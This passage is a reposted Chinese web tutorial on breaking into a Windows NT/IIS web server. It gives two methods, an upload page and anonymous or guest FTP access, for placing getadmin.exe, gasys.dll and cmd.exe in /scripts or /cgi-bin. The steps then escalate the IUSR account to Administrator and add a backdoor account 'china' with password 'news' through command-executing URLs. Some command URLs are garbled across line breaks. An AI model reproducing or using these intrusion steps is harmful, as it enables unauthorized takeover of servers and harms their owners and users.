http://www.xxx.com/scripts/uploadn.aspguest和iusr_ntsvr2这两个帐号都可以进这个asp页面,在这里把文件getadmin和gasys.dll以及cmd.exe上传到/scripts目录。
然后输入:
http://www.xxx.com/scripts/getadmin.exe?IUSR_ntsvr2大约十多秒后屏幕显示:
CGI Error这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
下面可以Add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32
et.exe%20user%20china%20news%20/add这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/scripts/getadmin.exe?china第二个方法、用匿名Ftp
如果允许匿名帐号ftp登陆的设定,也给我们带来了突破NT server的机会。我们用ftp登陆一个NT server,比如:www.xxx.com(示例名):
ftp www.xxx.com
Connected to www.xxx.com
220 ntsvr2 Microsoft FTP Service (Version 3.0).Ntsvr2这个东西暴露了其NETbios名,那么在IIS的背景下,必然会有一个IUSR_ntsvr2的用户帐号,属于Domain user组,这个帐号我们以后要用来获取Administrator的权限。
User (www.xxx.com:(none)):anonymousPassword:输入 guest@ 或者guest。
对于缺乏网络安全知识的管理员来说,很多人没有将guest帐号禁止,或者没有设置密码。那么guest帐号就是一个可用的正确的用户帐号,虽然只属于Domain guest组。在这种情况下我们就可以进NT server的ftp了。
进去以后,看看目录列表,试试 cd /scripts 或cgi-bin等关键目录,如果运气好,改变目录成功,这时你就有了80%的把握。
把Winnt下的cmd.execopy到cgi-bin,把getadmin和gasys.dll传上去到cgi-bin,然后输入:
http://www.xxx.com/cgi-bin/getadmin.exe?IUSR_ntsvr2大约十多秒后屏幕显示:
CGI Error这时有90%的可能是:你已经把IUSR_ntsvr2升级为Administrator,也就是任何访问该web站的人都是管理员。
下面可以add user:
http://www.xxx.com/cgi-bin/cmd.exe?/c%20c:winntsystem32
et.exe%20user%20china%20news%20/add这样就创建了一个叫china用户,密码是news,然后:
http://www.xxx.com/cgi-bin/getadmin.exe?china来自:http://www.qqread.com/winnt/w351192.html 
更多内容请看Windows操作系统安装、Windows权限设置、Windows操作系统安全集专题,或进入讨论组讨论。
相关专题
- Windows操作系统安装 (15669篇文章)
- Windows权限设置 (10273篇文章)
- Windows操作系统安全集 (18739篇文章)
- Windows频道 (9846篇文章)
- 文件权限 (54篇文章)
- Windows 2003操作系统十四招加速大法 (0次浏览)
- Windows操作系统文件管理的八大技巧 (0次浏览)
- Windows Server 2008网络性能的说明 (0次浏览)
- Windows 2003系统网络负载均衡的实现 (0次浏览)
- Windows 2008系统中安装群集连续复制 (0次浏览)
- 微软Windows Server 2003小企业版存风险 (0次浏览)
- Windows Server 2008安装群集连续复制 (0次浏览)
- 揭示Windows Server 2008的虚拟化 (0次浏览)
- Windows Home Server问题解答 (0次浏览)
- 为家中环境而设计的Windows Home Server (0次浏览)
